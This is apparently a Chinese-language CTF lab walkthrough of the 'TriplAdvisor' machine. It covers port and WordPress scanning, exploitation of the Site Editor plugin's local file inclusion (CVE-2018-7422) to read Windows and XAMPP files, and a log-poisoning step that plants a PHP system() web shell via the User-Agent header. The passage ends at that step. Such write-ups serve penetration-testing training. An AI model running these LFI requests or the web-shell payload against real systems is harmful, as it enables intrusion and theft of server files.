![\"image-20250604114245534\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737262.png\")
<\/div><\/p>\n\u8fd9\u91cc\u9776\u673a\u662f\u4ec5\u4e3b\u673a\uff0c\u6839\u636e\u81ea\u5df1\u7684\u60c5\u51b5\u8fdb\u884c\u4fee\u6539\uff1a<\/p>\n
![\"image-20250604115340621\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737263.png\")
<\/div><\/p>\n![\"image-20250604120117273\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737265.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo rustscan -a $IP -- -sCV -Pn\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\nOpen 192.168.10.102:445\nOpen 192.168.10.102:5985\nOpen 192.168.10.102:8080\n\nPORT STATE SERVICE REASON VERSION\n445\/tcp open microsoft-ds? syn-ack ttl 128\n5985\/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n8080\/tcp open http syn-ack ttl 128 Apache httpd\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/tripladvisor:8080\/wordpress\/\n|_http-server-header: Apache\n|_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289\n|_http-open-proxy: Proxy might be redirecting requests\nMAC Address: 08:00:27:BC:3F:CE (Oracle VirtualBox virtual NIC)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n| 2:1:0: \n|_ Message signing enabled but not required\n| smb2-time: \n| date: 2025-06-04T04:07:56\n|_ start_date: 2025-06-04T18:59:30\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 59001\/tcp): CLEAN (Timeout)\n| Check 2 (port 57067\/tcp): CLEAN (Timeout)\n| Check 3 (port 10647\/udp): CLEAN (Timeout)\n| Check 4 (port 41420\/udp): CLEAN (Timeout)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 3s<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u57df\u540d\u89e3\u6790\u4ee5\u53ca\u8df3\u8f6c\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo vim \/etc\/hosts \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cat \/etc\/hosts | grep $IP \n192.168.10.102 tripladvisor\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -I http:\/\/tripladvisor:8080\/wordpress\/ \nHTTP\/1.1 200 OK\nDate: Wed, 04 Jun 2025 04:13:53 GMT\nServer: Apache\nSet-Cookie: PHPSESSID=npdfldo41ae5urlct2d4lb3114; path=\/; HttpOnly\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nX-Pingback: http:\/\/tripladvisor:8080\/wordpress\/xmlrpc.php\nLink: <http:\/\/tripladvisor:8080\/wordpress\/wp-json\/>; rel="https:\/\/api.w.org\/"\nLink: <http:\/\/tripladvisor:8080\/wordpress\/>; rel=shortlink\nContent-Type: text\/html; charset=UTF-8\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo dirsearch -u http:\/\/tripladvisor:8080\/wordpress\/ 2>\/dev\/null \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/TriplAdvisor\/reports\/http_tripladvisor_8080\/_wordpress__25-06-04_00-14-55.txt\n\nTarget: http:\/\/tripladvisor:8080\/\n\n[00:14:55] Starting: wordpress\/\n[00:15:18] 404 - 1016B - \/wordpress\/%2e%2e\/\/google.com\n[00:15:18] 403 - 1004B - \/wordpress\/%C0%AE%C0%AE%C0%AF\n[00:15:18] 403 - 1018B - \/wordpress\/%3f\/\n[00:15:33] 403 - 1004B - \/wordpress\/%ff\nCTRL+C detected: Pausing threads, please wait...\n^C\nTask Completed<\/code><\/pre>\n\u6ca1\u626b\u5230\u5565\u6682\u65f6\u653e\u5f03\uff0c\u5982\u679c\u7b49\u4e0b\u6ca1\u7ebf\u7d22\u518d\u626b\u63cf\u3002<\/p>\n
wpscan\u626b\u63cf<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u535a\u5ba2\uff0c\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ wpscan --url http:\/\/tripladvisor:8080\/wordpress\/ --api-token XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.25\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? [Y]es [N]o, default: [N]Y\n[i] Updating the Database ...\n[i] Update completed.\n\n[+] URL: http:\/\/tripladvisor:8080\/wordpress\/ [192.168.10.102]\n[+] Started: Wed Jun 4 00:18:14 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/tripladvisor:8080\/wordpress\/xmlrpc.php\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n | Confirmed By:\n | - Link Tag (Passive Detection), 30% confidence\n | - Direct Access (Aggressive Detection), 100% confidence\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/tripladvisor:8080\/wordpress\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 5.1.19 identified (Outdated, released on 2024-06-24).\n | Found By: Emoji Settings (Passive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/, Match: '-release.min.js?ver=5.1.19'\n | Confirmed By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-includes\/css\/dist\/block-library\/style.min.css?ver=5.1.19\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-includes\/js\/wp-embed.min.js?ver=5.1.19\n\n[+] WordPress theme in use: expert-adventure-guide\n | Location: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/\n | Last Updated: 2025-05-09T00:00:00.000Z\n | Readme: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/readme.txt\n | [!] The version is out of date, the latest version is 2.3\n | Style URL: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/style.css?ver=5.1.19\n | Style Name: Expert Adventure Guide\n | Style URI: https:\/\/www.seothemesexpert.com\/wordpress\/free-adventure-wordpress-theme\/\n | Description: Expert Adventure Guide is a specialized and user-friendly design crafted for professional adventure ...\n | Author: drakearthur\n | Author URI: https:\/\/www.seothemesexpert.com\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n | Confirmed By: Css Style In 404 Page (Passive Detection)\n |\n | Version: 1.0 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/style.css?ver=5.1.19, Match: 'Version: 1.0'\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] editor\n | Location: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\n |\n | Found By: Urls In Homepage (Passive Detection)\n | Confirmed By: Urls In 404 Page (Passive Detection)\n |\n | Version: 1.1 (100% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:02:52 <==============================================================================================================> (137 \/ 137) 100.00% Time: 00:02:52\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 22\n\n[+] Finished: Wed Jun 4 00:21:38 2025\n[+] Requests Done: 186\n[+] Cached Requests: 6\n[+] Data Sent: 56.919 KB\n[+] Data Received: 13.771 MB\n[+] Memory used: 269.586 MB\n[+] Elapsed time: 00:03:24<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u7ec4\u4ef6\u6f0f\u6d1e\u5229\u7528<\/h3>\n
\u53d1\u73b0wordpress<\/code>\u7684\u4e00\u4e2a\u7ec4\u4ef6\uff0c\u4e0d\u77e5\u9053\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdb\u884c\u67e5\u8be2\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit editor 1.1 \n----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Amaya 11.1 - W3C Editor\/Browser 'defer' Remote Stack Overflow | windows\/remote\/8321.py\nAmaya 11.1 - W3C Editor\/Browser (defer) Stack Overflow (PoC) | windows\/dos\/8314.php\nCMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload | php\/webapps\/5691.php\nDjango CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting | python\/webapps\/40129.txt\nDrupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x\/7.x) - Persistent Cross-Site Scripting | php\/webapps\/25493.txt\nMaximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload | php\/webapps\/15960.txt\noXygen XML Editor 21.1.1 - XML External Entity Injection | windows\/local\/47658.txt\npragmaMx 1.12.1 - '\/includes\/wysiwyg\/spaw\/editor\/plugins\/imgpopup\/img_popup.php?img_url' Cross-Site Scripting | php\/webapps\/37313.txt\nSimple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload | php\/webapps\/36410.txt\nWordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php\/webapps\/44340.txt\nWordPress Plugin User Role Editor < 4.25 - Privilege Escalation | php\/webapps\/44595.rb\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results<\/code><\/pre>\n\u770b\u8d77\u6765\u6ca1\u5565\u5934\u7eea\u554a\u3002\u3002\u3002\u6362\u4e00\u4e2a\u5de5\u5177\u518d\u626b\u4e00\u4e0b\uff0c\u770b\u770b\u662f\u4e0d\u662f\u6f0f\u4e86\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cmseek -u http:\/\/tripladvisor:8080\/wordpress\/\n___ _ _ ____ ____ ____ _ _\n| |\\\/| [__ |___ |___ |_\/ by @r3dhax0r\n|___ | | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+] Deep Scan Results [+] \n\n \u250f\u2501Target: tripladvisor:8080\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503 \u2502\n \u2503 \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Readme file found: http:\/\/tripladvisor:8080\/wordpress\/\/readme.html\n \u2503 \u251c\u2500\u2500 License file: http:\/\/tripladvisor:8080\/wordpress\/\/license.txt\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Plugin: editor\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 4.3\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\n \u2503 \u2502\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Theme: expert-adventure-guide\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 5.1.19\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/themes\/expert-adventure-guide\n \u2503 \u2502\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Usernames harvested: 1\n \u2503 \u2502 \u2570\u2500\u2500 admin\n \u2503 \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/TriplAdvisor\/Result\/tripladvisor_8080_wordpress\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 19.36 Seconds, using 44 Requests\n\n CMSeeK says ~ addio<\/code><\/pre>\n\u7136\u540e\u5f80\u56de\u627e\u627e\uff0c\u53d1\u73b0\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n=== Site Editor - WordPress Site Builder - Theme Builder and Page Builder ===\nContributors: wpsiteeditor\nTags: site editor, site builder, page builder, theme builder, theme framework, design, inline editor, inline text editor, layout builder,live options, live, customizer, theme customizer, header builder, footer builder, fully customizable, design options,design editor, options framework, front end, page builder plugin, builder, responsive, front end editor, landing page, editor, drag-and-drop, shortcode, wordpress, ultra flexible, unlimited tools, elements, modules, support, seo, animation, absolute flexibility, live theme options, video backgrounds, font awesome, Optimized, fast, quick, ux, ui\nRequires at least: 4.7\nTested up to: 4.7.4\nStable tag: 1.1\nLicense: GPLv3\nLicense URI: https:\/\/www.gnu.org\/licenses\/gpl-3.0.html\n\nSiteEditor is The best solution for build your WordPress site with The best drag and drop WordPress Site, theme and Page Builder.Any theme, any page, any design.\n\n== Description ==\n\n**What is the Site Editor?**\n\nSite Editor is the most powerful Site Builder which is designed for WordPress. It's a powerful, advanced, user-friendly front end editor and you can build your website via drag and drop and full live options. Site Editor is also a powerful front-end platform for the developer.\n\n**OUR OFFICIAL WEBSITE & GITHUB**\n\n[SiteEditor.ORG](https:\/\/www.siteeditor.org)\n\n[SiteEditor GitHub Repository](https:\/\/github.com\/SiteEditor\/editor)\n\n-----------<\/code><\/pre>\n\u7136\u540e\u53d1\u73b0\u4e86\u5168\u79f0\u4e3aSite Editor<\/code>\uff0c\u524d\u9762\u7b5b\u9009\u5230\u4e86\u8fd9\u4e2a\u6d1e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit Site Editor 1.1\n----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting | python\/webapps\/40129.txt\nDrupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x\/7.x) - Persistent Cross-Site Scripting | php\/webapps\/25493.txt\npragmaMx 1.12.1 - '\/includes\/wysiwyg\/spaw\/editor\/plugins\/imgpopup\/img_popup.php?img_url' Cross-Site Scripting | php\/webapps\/37313.txt\nWordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php\/webapps\/44340.txt\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit -m php\/webapps\/44340.txt\n Exploit: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion\n URL: https:\/\/www.exploit-db.com\/exploits\/44340\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/44340.txt\n Codes: CVE-2018-7422\n Verified: True\nFile Type: Unicode text, UTF-8 text\nCopied to: \/home\/kali\/temp\/TriplAdvisor\/44340.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cat 44340.txt \nProduct: Site Editor WordPress Plugin - https:\/\/wordpress.org\/plugins\/site-editor\/\nVendor: Site Editor\nTested version: 1.1.1\nCVE ID: CVE-2018-7422\n\n** CVE description **\nA Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php.\n\n** Technical details **\nIn site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP\u2019s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.\n\nVulnerable code:\nif( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){\n require_once $_REQUEST['ajax_path'];\n}\n\nhttps:\/\/plugins.trac.wordpress.org\/browser\/site-editor\/trunk\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?rev=1640500#L5\n\nBy providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.\n\n** Proof of Concept **\nhttp:\/\/<host>\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\n\n** Solution **\nNo fix available yet.\n\n** Timeline **\n03\/01\/2018: author contacted through siteeditor.org's contact form; no reply\n16\/01\/2018: issue report filled on the public GitHub page with no technical details\n18\/01\/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail\n19\/01\/2018: report sent; author says he will fix this issue "very soon"\n31\/01\/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply\n14\/02\/2018: WP Plugins team contacted; no reply\n06\/03\/2018: vendor contacted; no reply\n07\/03\/2018: vendor contacted; no reply\n15\/03\/2018: public disclosure\n\n** Credits **\nVulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).\n\n--\nBest Regards,\n\nNicolas Buzy-Debat\nOrange Cyberdefense Singapore (CERT-LEXSI) <\/code><\/pre>\n\u8fdb\u884c\u786e\u8ba4\u4e00\u4e0b\uff0c\u56e0\u4e3a\u77e5\u9053\u8fd9\u4e2a\u662f windows \u673a\u5b50\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u4e00\u4e0b\u76f8\u5173\u76ee\u5f55\uff0c\u6bd4\u5982\uff1a<\/p>\n
\/boot.ini\n\/autoexec.bat\n\/windows\/system32\/drivers\/etc\/hosts\n\/windows\/repair\/SAM\n\/windows\/panther\/unattended.xml\n\/windows\/panther\/unattend\/unattended.xml\n\/windows\/system32\/license.rtf\n\/windows\/system32\/eula.txt<\/code><\/pre>\n\u4ee5\u53ca\u8fd9\u91cc\u7684\u8def\u5f84\u4e5f\u8981\u6539\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/<host>\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\nhttp:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor<\/code><\/pre>\n\u6539\u4e00\u4e0b\u53d1\u73b0\u6709\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s 'http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts' | html2text\n\nSkip_to_content\nThe best travel online guide!\n\n * Home\n\n Search for: [Unknown INPUT type]\nCLOSE\n [TriplAdvisor]\n 1. Home \/ \n 2. Error 404\n****** Error 404 ******\nCopyright \u00a9 2023, Adventure_Guide | WordPress_Theme\nTOP\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s 'http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts' | html2text\n# Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used\nby Microsoft TCP\/IP for Windows. # # This file contains the mappings of IP\naddresses to host names. Each # entry should be kept on an individual line. The\nIP address should # be placed in the first column followed by the corresponding\nhost name. # The IP address and the host name should be separated by at least\none # space. # # Additionally, comments (such as these) may be inserted on\nindividual # lines or following the machine name denoted by a '#' symbol. # #\nFor example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10\nx.acme.com # x client host # localhost name resolution is handled within DNS\nitself. # 127.0.0.1 localhost # ::1 localhost {"success":true,"data":{"output":\n[]}}\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s 'http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts'\n# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP\/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a '#' symbol.\n#\n# For example:\n#\n# 102.54.94.97 rhino.acme.com # source server\n# 38.25.63.10 x.acme.com # x client host\n\n# localhost name resolution is handled within DNS itself.\n# 127.0.0.1 localhost\n# ::1 localhost\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u5e38\u89c1\u76ee\u5f55\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ ll \/usr\/share\/seclists\/Fuzzing\/LFI\ntotal 872\n-rw-r--r-- 1 root root 254354 Feb 16 2024 LFI-etc-files-of-all-linux-packages.txt\n-rw-r--r-- 1 root root 22883 Feb 16 2024 LFI-gracefulsecurity-linux.txt\n-rw-r--r-- 1 root root 9416 Feb 16 2024 LFI-gracefulsecurity-windows.txt\n-rw-r--r-- 1 root root 32507 Feb 16 2024 LFI-Jhaddix.txt\n-rw-r--r-- 1 root root 501947 Feb 16 2024 LFI-LFISuite-pathtotest-huge.txt\n-rw-r--r-- 1 root root 22215 Feb 16 2024 LFI-LFISuite-pathtotest.txt\n-rw-r--r-- 1 root root 31898 Feb 16 2024 LFI-linux-and-windows_by-1N3@CrowdShield.txt\n-rw-r--r-- 1 root root 2165 Feb 16 2024 OMI-Agent-Linux.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ wfuzz -c -w \/\/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-windows.txt -u "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=FUZZ" --hh 72 2>\/dev\/null\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer *\n********************************************************\n\nTarget: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=FUZZ\nTotal requests: 235\n\n=====================================================================\nID Response Lines Word Chars Payload \n=====================================================================\n\n000000044: 200 7 L 13 W 129 Ch "C:\/Windows\/win.ini" \n000000043: 200 21 L 135 W 861 Ch "C:\/WINDOWS\/System32\/drivers\/etc\/hosts" \n000000048: 200 939 L 15552 W 206724 Ch "C:\/xampp\/apache\/logs\/access.log" \n000000049: 200 33746 712193 W 5744606 C "C:\/xampp\/apache\/logs\/error.log" \n L h \n000000164: 200 0 L 1 W 37 Ch "c:\/xampp\/phpMyAdmin\/config.inc.php" \n000000163: 500 0 L 0 W 0 Ch "c:\/xampp\/php\/php.ini" \n000000165: 200 72 L 319 W 2133 Ch "c:\/xampp\/sendmail\/sendmail.ini" \n000000160: 200 564 L 2563 W 21507 Ch "c:\/xampp\/apache\/conf\/httpd.conf" \n000000154: 200 1092 L 17388 W 243793 Ch "c:\/xampp\/apache\/logs\/access.log" \n000000155: 200 33746 712193 W 5744606 C "c:\/xampp\/apache\/logs\/error.log" \n L h \n000000229: 200 0 L 1 W 37 Ch "c:\/WINDOWS\/setuperr.log" \n000000227: 200 176 L 1036 W 14543 Ch "c:\/WINDOWS\/setupact.log" \n000000219: 200 79 L 585 W 3720 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam" \n000000220: 200 16 L 55 W 444 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/networks" \n000000218: 200 21 L 135 W 861 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/hosts" \n000000221: 200 27 L 171 W 1395 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/protocol" \n000000222: 200 285 L 1238 W 17500 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/services" \n000000232: 200 2806 L 28871 W 227306 Ch "c:\/WINDOWS\/WindowsUpdate.log" \n\nTotal time: 0\nProcessed Requests: 235\nFiltered Requests: 217\nRequests\/sec.: 0<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u65e5\u5fd7\u5305\u542b\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
curl -A "<?php system(\\$_GET['cmd']);?>" http:\/\/tripladvisor:8080\/wordpress\/ <\/code><\/pre>\n\u4f46\u662f\u6211\u4f3c\u4e4e\u628a\u65e5\u5fd7\u73a9\u574f\u4e86\uff0c\u5c1d\u8bd5\u91cd\u65b0\u5bfc\u5165\u955c\u50cf\u3002\u3002\u3002\u3002\u7136\u540e\u518d\u8bd5\u4e00\u6b21\uff1a<\/p>\n
